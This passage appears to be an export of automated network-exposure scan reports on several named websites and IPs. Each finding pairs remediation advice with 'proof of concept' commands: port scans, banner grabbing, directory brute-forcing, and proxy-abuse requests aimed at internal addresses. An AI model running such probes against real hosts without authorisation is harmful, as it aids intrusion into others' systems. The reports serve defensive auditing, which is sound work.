risks including eavesdropping and man-in-the-middle attacks unless properly redirected to HTTPS.\n\nAttackers often use scanning tools like Masscan or Nmap to detect open HTTP ports:\n```bash\nmasscan -p80 35.227.194.51\n```\n\n**Attack Scenario (Proof of Concept)**  \n1. Scan reveals port 80 open:\n   ```bash\n   masscan -p80 35.227.194.51\n   ```\n2. Fetch homepage content:\n   ```bash\n   curl http://35.227.194.51/\n   ```\n3. Analyze response headers and content for version disclosures or misconfigurations.\n\n**Business Impact**  \nUnsecured HTTP exposure can result in credential theft, session hijacking, or content tampering. 
It also violates compliance standards requiring encryption in transit.\n\n**Remediation**  \n- Redirect all HTTP requests to HTTPS using proper rewrite rules.\n- Disable direct access to port 80 externally if not required.\n- Implement HSTS headers to enforce secure connections.\n- Reference: [OWASP A02:2021 – Cryptographic Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures/)\n\n---\n\n### Open Port 443/tcp on 34.120.190.48\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | https://www.veltris.com/, 34.120.190.48 |\n\n**Description**  \nThe system exposes port 443/tcp on IP address `34.120.190.48` associated with domain `www.veltris.com`. This suggests an active HTTPS-enabled web service. Although standard practice, improper TLS setup or outdated software versions can introduce vulnerabilities.\n\nTools like Masscan or Nmap can be used to discover this:\n```bash\nmasscan -p443 34.120.190.48\n```\n\n**Attack Scenario (Proof of Concept)**  \n1. Perform scan:\n   ```bash\n   masscan -p443 34.120.190.48 --rate=1000\n   ```\n2. Enumerate certificate details:\n   ```bash\n   openssl s_client -connect www.veltris.com:443\n   ```\n3. 
Check for deprecated cipher suites or expired certificates.\n\n**Business Impact**  \nMisconfigured HTTPS can undermine user trust, expose sensitive information, and violate regulatory requirements around secure communications.\n\n**Remediation**  \n- Enforce strong TLS policies (TLS 1.2+).\n- Renew SSL certificates before expiration.\n- Audit supported cipher suites regularly.\n- Reference: [CWE-310](https://cwe.mitre.org/data/definitions/310.html)\n\n---\n\n### Open Port 80/tcp on 34.120.190.48\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | https://www.veltris.com/, 34.120.190.48 |\n\n**Description**  \nPort 80/tcp is open on IP address `34.120.190.48`, which resolves to `www.veltris.com`. This implies a web server accepting unencrypted HTTP traffic. Without automatic redirection to HTTPS, users may transmit credentials or other sensitive data insecurely.\n\nScanning commands include:\n```bash\nnmap -p80 34.120.190.48\n```\n\n**Attack Scenario (Proof of Concept)**  \n1. Identify open port:\n   ```bash\n   nmap -p80 34.120.190.48\n   ```\n2. Access page without encryption:\n   ```bash\n   curl http://www.veltris.com/\n   ```\n3. 
Observe lack of redirect or warning indicators.\n\n**Business Impact**  \nInsecure transmission of login forms or personal data can lead to interception, identity theft, and legal liability under privacy regulations.\n\n**Remediation**  \n- Configure web server to automatically redirect HTTP to HTTPS.\n- Apply HSTS header to prevent downgrade attacks.\n- Remove or restrict unnecessary HTTP listeners.\n- Reference: [OWASP A07:2021 – Identification and Authentication Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/)\n\n---\n\n### Open Port 80/tcp (HTTP) — nginx on www.veltris.com\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.veltris.com |\n\n**Description**  \nNginx web server is running on port 80/tcp for `www.veltris.com`. While common, exposing internal server technology can aid attackers in fingerprinting and targeting known exploits specific to Nginx versions.\n\nEnumeration example:\n```bash\ncurl -I http://www.veltris.com/\n# Server: nginx\n```\n\n**Attack Scenario (Proof of Concept)**  \n1. Detect server type:\n   ```bash\n   curl -I http://www.veltris.com/\n   ```\n2. Search exploit databases for known Nginx vulnerabilities matching the version.\n3. 
Attempt directory traversal or misconfiguration exploitation.\n\n**Business Impact**  \nRevealing backend technologies facilitates targeted attacks, increasing likelihood of successful compromise.\n\n**Remediation**  \n- Remove or obfuscate identifying server headers (`Server:` field).\n- Keep Nginx updated to latest stable release.\n- Apply hardening guides per vendor recommendations.\n- Reference: [CWE-200](https://cwe.mitre.org/data/definitions/200.html)\n\n---\n\n### Open Port 443/tcp (HTTPS) — nginx on www.veltris.com\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.veltris.com |\n\n**Description**  \nSecure web service is hosted on port 443/tcp using Nginx. As with HTTP, revealing server software helps adversaries tailor their approach. Additionally, older versions might contain exploitable flaws.\n\nExample detection:\n```bash\ncurl -Ik https://www.veltris.com/\n# Server: nginx\n```\n\n**Attack Scenario (Proof of Concept)**  \n1. Identify server:\n   ```bash\n   curl -Ik https://www.veltris.com/\n   ```\n2. Cross-reference version against vulnerability databases.\n3. 
Exploit known issues related to Nginx modules or configurations.\n\n**Business Impact**  \nTechnology disclosure enables focused attacks, potentially leading to service disruption or unauthorized access.\n\n**Remediation**  \n- Suppress server identification headers.\n- Maintain up-to-date Nginx installations.\n- Monitor for new CVEs affecting deployed components.\n- Reference: [CVE-2022-41741](https://nvd.nist.gov/vuln/detail/CVE-2022-41741)\n\n---\n\n### Open Port 8008/tcp (HTTP) on www.veltris.com\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.veltris.com |\n\n**Description**  \nPort 8008/tcp is open and serving HTTP traffic on `www.veltris.com`. Non-standard ports increase visibility and may indicate development/test environments or alternative administrative interfaces left exposed unintentionally.\n\nDiscovery command:\n```bash\nnmap -p8008 www.veltris.com\n```\n\n**Attack Scenario (Proof of Concept)**  \n1. Scan for non-standard ports:\n   ```bash\n   nmap -p8000-9000 www.veltris.com\n   ```\n2. Probe endpoint:\n   ```bash\n   curl http://www.veltris.com:8008/\n   ```\n3. 
Investigate returned content for debug info or admin panels.\n\n**Business Impact**  \nAlternative HTTP services may bypass normal monitoring and controls, creating hidden attack vectors.\n\n**Remediation**  \n- Close unused ports unless explicitly needed.\n- Protect alternate services behind authentication or IP whitelisting.\n- Conduct regular audits of listening services across infrastructure.\n- Reference: [CWE-1190](https://cwe.mitre.org/data/definitions/1190.html)\n\n---\n\n### Open Port 8015/tcp (HTTP Proxy) — FortiGuard Web Filtering on www.veltris.com\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.veltris.com |\n\n**Description**  \nPort 8015/tcp hosts an HTTP proxy identified as FortiGuard Web Filtering. Exposed proxies can be abused for anonymizing malicious traffic or bypassing filtering mechanisms.\n\nDetection:\n```bash\nnmap -sV -p8015 www.veltris.com\n```\n\n**Attack Scenario (Proof of Concept)**  \n1. Identify proxy:\n   ```bash\n   nmap -sV -p8015 www.veltris.com\n   ```\n2. Test proxy functionality:\n   ```bash\n   curl --proxy http://www.veltris.com:8015 http://example.com\n   ```\n3. 
Abuse for outbound tunneling or evasion.\n\n**Business Impact**  \nPublicly available proxies enable abuse by threat actors, damaging reputation and possibly violating acceptable usage policies.\n\n**Remediation**  \n- Restrict proxy access to authorized networks.\n- Log and monitor proxy usage patterns.\n- Consider disabling if not operationally necessary.\n- Reference: [CWE-668](https://cwe.mitre.org/data/definitions/668.html)\n\n---\n\n### Open Port 8020/tcp (HTTP Proxy) — FortiGuard Web Filtering on www.veltris.com\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.veltris.com |\n\n**Description**  \nAnother instance of FortiGuard Web Filtering operates on port 8020/tcp. Similar concerns apply regarding unauthorized proxy usage and potential misuse.\n\nScan command:\n```bash\nnmap -sV -p8020 www.veltris.com\n```\n\n**Attack Scenario (Proof of Concept)**  \n1. Confirm proxy availability:\n   ```bash\n   nmap -sV -p8020 www.veltris.com\n   ```\n2. Route traffic through proxy:\n   ```bash\n   curl --proxy http://www.veltris.com:8020 http://targetsite.com\n   ```\n\n**Business Impact**  \nMultiple exposed proxies compound risk and complicate tracking of malicious activity originating from the asset.\n\n**Remediation**  \n- Consolidate proxy functions behind centralized control.\n- Enforce strict access controls and logging.\n- Periodically review and decommission redundant services.\n- Reference: [CWE-668](https://cwe.mitre.org/data/definitions/668.html)\n\n---\n\n### Host Flagged on Blacklist list.quorum.to: SPAM\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 3.7 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.veltris.com |\n\n**Description**  \nDomain `www.veltris.com` has been flagged on the DNS-based spam blacklist `list.quorum.to`. 
This indicates that the domain or its associated IP addresses have sent unsolicited email or exhibited behavior consistent with spam operations.\n\nVerification:\n```bash\ndig TXT +short 34.120.190.48.list.quorum.to\n```\n\n**Attack Scenario (Proof of Concept)**  \n1. Query blacklists:\n   ```bash\n   dig TXT +short 34.120.190.48.list.quorum.to\n   ```\n2. Confirm listing status.\n3. Use this knowledge to craft phishing campaigns leveraging compromised reputation.\n\n**Business Impact**  \nBlacklisted domains suffer reduced deliverability, customer distrust, and possible sanctions from email providers.\n\n**Remediation**  \n- Investigate root cause of spam listing (compromised mail relay, malware).\n- Request delisting from affected blacklists after remediation.\n- Implement SPF/DKIM/DMARC records to authenticate outgoing emails.\n- Reference: [OWASP Email Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Email_Security_Cheat_Sheet.html)","summary":{"total":10}},"summary":{"total":10}},{"_id":{"$oid":"6a0e42cfff7cb8e001b1ffaf"},"created_at":{"$date":"2026-05-20T23:25:03.077Z"},"url":"https://springs.com.pk","tool":"generate_network_exposure_report","result":{"url":"https://springs.com.pk","category":"network_exposure","timestamp":"2026-05-20T23:25:03.068487+00:00","report":"### Open Port 80/tcp on 208.91.112.55\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 208.91.112.55 |\n\n**Description**  \nPort 80/tcp is open on IP address `208.91.112.55`, indicating that a web server or HTTP-based service is listening on this standard HTTP port. 
This exposure allows external entities to initiate communication with services running over unencrypted HTTP traffic.\n\nAn attacker can use tools like Nmap or curl to probe the endpoint for further information about the hosted application, version details, directory listings, or vulnerabilities such as misconfigurations or outdated software versions.\n\n**Attack Scenario (Proof of Concept)**  \n```bash\n# Identify open ports using nmap\nnmap -p 80 208.91.112.55\n\n# Retrieve basic HTTP response headers\ncurl -I http://208.91.112.55/\n\n# Attempt fingerprinting via banner grabbing\nnc 208.91.112.55 80\nGET / HTTP/1.1\nHost: 208.91.112.55\n```\n\nThis reconnaissance may reveal server identity, installed modules, or default pages which could lead to exploitation paths.\n\n**Business Impact**  \nExposing port 80 without proper access controls increases the risk surface area by allowing unauthorized users to interact directly with internal systems. If not properly secured, it may expose sensitive content or provide an entry point into deeper infrastructure layers.\n\n**Remediation**  \n- Restrict access to port 80 at the firewall level unless explicitly required.\n- Redirect all HTTP traffic to HTTPS (port 443).\n- Ensure no sensitive applications are exposed publicly via plaintext HTTP.\n- Apply principle of least privilege and restrict source IPs where possible.\n\n---\n\n### Open Port 8020/tcp on 208.91.112.55\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 208.91.112.55 |\n\n**Description**  \nPort 8020/tcp is open on IP address `208.91.112.55`. While non-standard, this port often hosts proxy servers, development environments, or custom HTTP interfaces. 
Without additional context from service detection, its purpose remains ambiguous but represents potential attack vectors due to lack of encryption or authentication mechanisms.\n\nAttackers typically scan ranges of high-numbered TCP ports to discover hidden administrative panels, debug interfaces, or legacy services inadvertently left accessible.\n\n**Attack Scenario (Proof of Concept)**  \n```bash\n# Scan for open ports including higher ranges\nnmap -p 8020 208.91.112.55\n\n# Probe the service manually\ncurl -v http://208.91.112.55:8020/\n```\n\nIf the service returns verbose error messages or exposes configuration files, attackers might gain insight into backend logic or credentials.\n\n**Business Impact**  \nUnintended exposure of auxiliary services can result in lateral movement opportunities within the network, especially if these endpoints bypass normal monitoring or logging practices.\n\n**Remediation**  \n- Audit and document all services bound to non-standard ports.\n- Disable unnecessary services or bind them only locally (`localhost`).\n- Implement strong authentication and TLS termination for externally facing services.\n- Monitor logs for suspicious activity targeting unusual ports.\n\n---\n\n### Open Port 443/tcp on 208.91.112.55\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 208.91.112.55 |\n\n**Description**  \nPort 443/tcp is open on IP address `208.91.112.55`, signifying that a secure HTTPS web server is active. 
Although encrypted, this still presents an attack surface for SSL/TLS-related issues, certificate mismanagement, or insecure configurations.\n\nAttackers commonly perform TLS handshake analysis, cipher suite enumeration, and certificate validation checks to assess weaknesses in cryptographic implementations.\n\n**Attack Scenario (Proof of Concept)**  \n```bash\n# Test supported TLS versions and ciphers\nopenssl s_client -connect 208.91.112.55:443 -tls1_2\n\n# Check certificate chain validity\necho | openssl s_client -showcerts -connect 208.91.112.55:443 2>/dev/null | openssl x509 -text -noout\n```\n\nWeak protocols (e.g., TLS 1.0), expired certificates, or self-signed certs increase vulnerability risks.\n\n**Business Impact**  \nImproperly configured HTTPS can undermine user trust, violate compliance standards (PCI DSS, HIPAA), and allow man-in-the-middle attacks leading to credential theft or session hijacking.\n\n**Remediation**  \n- Enforce modern TLS versions (minimum TLS 1.2).\n- Use strong cipher suites and disable weak ones (RC4, DES).\n- Regularly renew and validate SSL certificates.\n- Employ HSTS headers to enforce HTTPS usage.\n- Reference: [OWASP Transport Layer Protection](https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure)\n\n---\n\n### Open Port 8008/tcp on 208.91.112.55\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 208.91.112.55 |\n\n**Description**  \nPort 8008/tcp is open on IP address `208.91.112.55`. 
Commonly used for alternative HTTP services or reverse proxies, this port lacks standardized protection models compared to well-known ports like 80 or 443.\n\nSuch services may be less hardened against common web threats and more prone to misconfiguration errors due to reduced visibility during audits.\n\n**Attack Scenario (Proof of Concept)**  \n```bash\n# Enumerate service behavior\ncurl -v http://208.91.112.55:8008/\n\n# Fuzz directories or parameters\nffuf -u http://208.91.112.55:8008/FUZZ -w /path/to/dir-wordlist.txt\n```\n\nExposed APIs or test endpoints behind this port may leak internal data structures or accept malformed inputs leading to injection flaws.\n\n**Business Impact**  \nInsecure deployment of alternate HTTP interfaces can expose internal APIs, staging environments, or debugging tools to public networks, increasing insider threat risks and unauthorized system manipulation.\n\n**Remediation**  \n- Limit accessibility to trusted sources only.\n- Deploy WAF rulesets tailored to protect non-standard HTTP ports.\n- Remove or harden any testing/staging deployments before production release.\n- Conduct regular penetration tests focused on non-standard ports.\n\n---\n\n### Open Port 8015/tcp on 208.91.112.55\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 208.91.112.55 |\n\n**Description**  \nPort 8015/tcp is open on IP address `208.91.112.55`. Like other high-numbered ports, this one may host specialized services such as API gateways, reverse proxies, or embedded device interfaces. 
The absence of explicit identification makes it difficult to determine whether appropriate protections exist.\n\nAttackers frequently target obscure ports to find backdoors, undocumented features, or poorly maintained services.\n\n**Attack Scenario (Proof of Concept)**  \n```bash\n# Basic connectivity check\ntelnet 208.91.112.55 8015\n\n# Send crafted requests\nprintf \"GET / HTTP/1.1\\r\\nHost: 208.91.112.55:8015\\r\\n\\r\\n\" | nc 208.91.112.55 8015\n```\n\nResponses may include server banners, redirect locations, or error traces revealing underlying architecture.\n\n**Business Impact**  \nUndocumented or forgotten services pose significant operational and security risks, particularly when they remain unpatched or unmaintained over time.\n\n**Remediation**  \n- Document and inventory all services operating on non-standard ports.\n- Decommission unused or obsolete services immediately.\n- Apply consistent patch management policies across all exposed assets.\n- Integrate automated scanning tools to detect rogue services.\n\n---\n\n### Open Port 80/tcp (HTTP) – nginx 1.29.1 on springs.com.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | springs.com.pk |\n\n**Description**  \nThe domain `springs.com.pk` has port 80 open and serves HTTP traffic via nginx version 1.29.1. 
While functional, exposing HTTP instead of enforcing HTTPS leaves communications vulnerable to interception and tampering.\n\nAdditionally, identifying the exact version helps attackers correlate known exploits tied to that build number.\n\n**Attack Scenario (Proof of Concept)**  \n```bash\n# Confirm server version disclosure\ncurl -I http://springs.com.pk/\n\n# Search exploit databases for nginx 1.29.1\nsearchsploit nginx 1.29\n```\n\nKnown vulnerabilities in older releases may allow remote code execution or denial-of-service conditions under certain configurations.\n\n**Business Impact**  \nFailure to encrypt web traffic violates best practices and regulatory requirements. Version disclosures facilitate targeted attacks and reduce overall defense-in-depth posture.\n\n**Remediation**  \n- Redirect all HTTP traffic to HTTPS using permanent redirects.\n- Suppress server version headers in nginx config:\n  ```nginx\n  server_tokens off;\n  ```\n- Keep nginx updated to latest stable branch.\n- Reference: [CWE-200: Information Exposure](https://cwe.mitre.org/data/definitions/200.html)\n\n---\n\n### Open Port 443/tcp (HTTPS) – nginx 1.29.1 on springs.com.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | springs.com.pk |\n\n**Description**  \nPort 443 is open on `springs.com.pk` and utilizes nginx 1.29.1 for serving HTTPS traffic. 
Despite encryption, disclosing the exact server version enables attackers to research associated vulnerabilities and tailor their approach accordingly.\n\nMoreover, improper TLS setup or missing security headers can weaken the effectiveness of HTTPS implementation.\n\n**Attack Scenario (Proof of Concept)**  \n```bash\n# Inspect TLS settings and header presence\ncurl -s --insecure -D - https://springs.com.pk/\n\n# Analyze TLS handshake with sslscan\nsslscan springs.com.pk\n```\n\nMissing security headers (HSTS, X-Frame-Options) leave clients susceptible to clickjacking or downgrade attacks.\n\n**Business Impact**  \nEven though HTTPS provides confidentiality, poor implementation undermines user privacy and opens avenues for advanced persistent threats.\n\n**Remediation**  \n- Enable recommended security headers in nginx:\n  ```nginx\n  add_header Strict-Transport-Security \"max-age=63072000; includeSubDomains; preload\" always;\n  add_header X-Frame-Options DENY;\n  add_header X-Content-Type-Options nosniff;\n  ```\n- Update nginx regularly to mitigate disclosed vulnerabilities.\n- Validate certificate chains and implement OCSP stapling.\n\n---\n\n### Open Port 8008/tcp (HTTP) on springs.com.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | springs.com.pk |\n\n**Description**  \nPort 8008 on `springs.com.pk` runs an HTTP service. As a non-standard port, it may indicate a secondary web interface, microservice, or development environment. 
These types of services often have relaxed security postures and limited oversight.\n\nAttackers leverage automated scanners to identify such endpoints and attempt to exploit them for initial footholds.\n\n**Attack Scenario (Proof of Concept)**  \n```bash\n# Access the service directly\ncurl http://springs.com.pk:8008/\n\n# Perform directory brute-force\ngobuster dir -u http://springs.com.pk:8008/ -w /usr/share/wordlists/dirb/common.txt\n```\n\nExposed admin panels or debug modes can grant unauthorized control over backend processes.\n\n**Business Impact**  \nSecondary HTTP services increase complexity and difficulty in maintaining uniform security baselines. They also expand the attack surface unnecessarily.\n\n**Remediation**  \n- Evaluate necessity of exposing this service externally.\n- Apply rate limiting and authentication measures.\n- Log and monitor access attempts to detect anomalies.\n- Consider consolidating services onto fewer standardized ports.\n\n---\n\n### Open Port 8015/tcp (HTTP Proxy) – FortiGuard Web Filtering on springs.com.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | springs.com.pk |\n\n**Description**  \nPort 8015 on `springs.com.pk` operates as an HTTP proxy identified as FortiGuard Web Filtering. 
Proxies inherently act as intermediaries between clients and origin servers, potentially introducing new attack vectors related to forwarding behaviors, caching logic, or access control bypasses.\n\nMisconfigured proxies can become pivot points for tunneling malicious traffic or evading perimeter defenses.\n\n**Attack Scenario (Proof of Concept)**  \n```bash\n# Test proxy functionality\ncurl --proxy http://springs.com.pk:8015 http://example.com/\n\n# Attempt SSRF-style abuse\ncurl -x http://springs.com.pk:8015 http://internal-api.local/admin\n```\n\nSuccessful proxy misuse can enable attackers to reach otherwise inaccessible internal resources.\n\n**Business Impact**  \nPublicly exposed filtering proxies can be abused to circumvent corporate policies, exfiltrate data, or launch internal reconnaissance campaigns.\n\n**Remediation**  \n- Restrict proxy access to authorized IP addresses.\n- Implement strict egress filtering and logging.\n- Disable anonymous proxy capabilities unless absolutely necessary.\n- Review vendor documentation for hardening guidelines.\n\n---\n\n### Open Port 8020/tcp (HTTP Proxy) – FortiGuard Web Filtering on springs.com.pk\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | springs.com.pk |\n\n**Description**  \nSimilar to port 8015, port 8020 on `springs.com.pk` functions as another instance of FortiGuard Web Filtering acting as an HTTP proxy. 
Multiple proxy instances suggest either redundancy or segmentation strategies, both of which require careful configuration to prevent unintended access patterns.\n\nEach exposed proxy multiplies the risk of misconfiguration and increases the burden of securing each individual endpoint.\n\n**Attack Scenario (Proof of Concept)**  \n```bash\n# Verify proxy operation\ncurl --proxy http://springs.com.pk:8020 http://google.com/\n\n# Try accessing local network resources\ncurl -x http://springs.com.pk:8020 http://192.168.1.1/\n```\n\nIf allowed, this could lead to lateral movement inside the organization’s private subnet.\n\n**Business Impact**  \nMultiple exposed proxies complicate incident response efforts and create redundant pathways for attackers to traverse protected boundaries undetected.\n\n**Remediation**  \n- Consolidate proxy services wherever feasible.\n- Enforce mutual TLS authentication for inter-service communication.\n- Audit proxy logs for signs of abuse or anomalous routing decisions.\n- Apply zero-trust principles to limit lateral traversal possibilities.\n\n---\n\n### Host Flagged on Blacklist list.quorum.to: SPAM\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.6 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) |\n| Category | network_exposure |\n| Asset / URL | springs.com.pk |\n\n**Description**  \nDomain `springs.com.pk` appears on the DNS blacklist `list.quorum.to` categorized as a spam source. 
Being blacklisted indicates prior involvement in unsolicited email distribution, possibly due to compromised mail relays, phishing sites, or botnet participation.\n\nBlacklisting affects deliverability rates and damages organizational reputation among partners and customers alike.\n\n**Attack Scenario (Proof of Concept)**  \n```bash\n# Query DNSBL status\ndig +short TXT springs.com.pk.list.quorum.to\n```\n\nA positive match confirms listing, suggesting ongoing abuse originating from the domain/IP space.\n\n**Business Impact**  \nEmail delivery failures, customer complaints, and brand degradation occur when domains are flagged as spam sources. Regulatory fines may apply depending on jurisdictional laws governing digital marketing ethics.\n\n**Remediation**  \n- Investigate root cause of spam classification (compromised accounts, malware infections).\n- Request delisting from affected blacklists after remediation.\n- Implement SPF/DKIM/DMARC records to authenticate outbound emails.\n- Monitor SMTP logs for suspicious relay activity.\n- Reference: [OWASP Email Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Email_Security_Cheat_Sheet.html)","summary":{"total":11}},"summary":{"total":11}},{"_id":{"$oid":"6a0f4a5037cadc7ccde99aaa"},"created_at":{"$date":"2026-05-21T18:09:20.652Z"},"url":"https://eveen.pk/","tool":"generate_network_exposure_report","result":{"url":"https://eveen.pk/","category":"network_exposure","timestamp":"2026-05-21T18:09:20.643798+00:00","report":"### Open Port 2083/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description**  \nPort 2083/tcp is open on IP address `23.227.38.65`. This port is commonly associated with cPanel's secure webmail interface or alternative HTTPS services. 
The exposure of such ports can indicate potential attack vectors if not properly secured or firewalled. An attacker may use tools like Nmap or Masscan to enumerate open ports and determine running services.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker performs a basic scan using Nmap:\n```bash\nnmap -p 2083 23.227.38.65\n```\nIf the service responds, they might attempt to connect via browser or curl:\n```bash\ncurl https://23.227.38.65:2083/\n```\nDepending on configuration, this could expose login interfaces or backend systems that should not be publicly accessible without proper authentication or access control.\n\n**Business Impact**  \nExposing unnecessary administrative or internal services increases the attack surface. If misconfigured, these endpoints can lead to unauthorized access, privilege escalation, or exploitation of known vulnerabilities in outdated software versions.\n\n**Remediation**  \n- Restrict access to port 2083/tcp using firewall rules (e.g., iptables, AWS Security Groups).\n- Ensure only authorized IPs or networks have access.\n- Disable or remove unused services from public-facing infrastructure.\n- Regularly audit exposed ports and services for compliance with least-privilege principles.\n\n---\n\n### Open Port 2095/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description**  \nPort 2095/tcp is open on IP address `23.227.38.65`. It typically corresponds to cPanel’s Webmail interface over HTTP. 
Exposing this port publicly may allow attackers to gain insight into hosting configurations or attempt brute-force attacks against user accounts.\n\n**Attack Scenario (Proof of Concept)**  \nUsing Nmap:\n```bash\nnmap -sV -p 2095 23.227.38.65\n```\nIf responsive, an attacker accesses:\n```\nhttp://23.227.38.65:2095\n```\nThey may then try common credentials or exploit weak password policies to gain access to email accounts hosted under cPanel.\n\n**Business Impact**  \nUnauthorized access to email accounts can result in phishing campaigns, credential theft, data exfiltration, and reputational harm due to compromised communications.\n\n**Remediation**  \n- Enforce strong authentication mechanisms including MFA.\n- Limit access to trusted IP ranges via firewalling.\n- Redirect all traffic to HTTPS (port 2096) instead of exposing insecure HTTP.\n- Monitor logs for suspicious login attempts.\n\n---\n\n### Open Port 8015/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description**  \nPort 8015/tcp is open on IP address `23.227.38.65`. While non-standard, it may host custom applications or development servers. 
Without further identification, its purpose remains ambiguous but still contributes to the overall attack surface.\n\n**Attack Scenario (Proof of Concept)**  \nScanning with Nmap:\n```bash\nnmap -A -p 8015 23.227.38.65\n```\nIf banners reveal application details, attackers may probe for known exploits or misconfigurations:\n```bash\nnc 23.227.38.65 8015\nGET / HTTP/1.1\nHost: 23.227.38.65\n```\n\n**Business Impact**  \nUnidentified services increase risk by providing unknown entry points that may lack monitoring, patching, or hardening practices.\n\n**Remediation**  \n- Identify and document the service running on port 8015.\n- Apply appropriate security controls based on function.\n- Remove or restrict access to non-critical or undocumented services.\n\n---\n\n### Open Port 8080/tcp on 23.227.38.65\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 23.227.38.65 |\n\n**Description**  \nPort 8080/tcp is widely used as an alternate HTTP server port, often for reverse proxies, development environments, or containerized apps. 
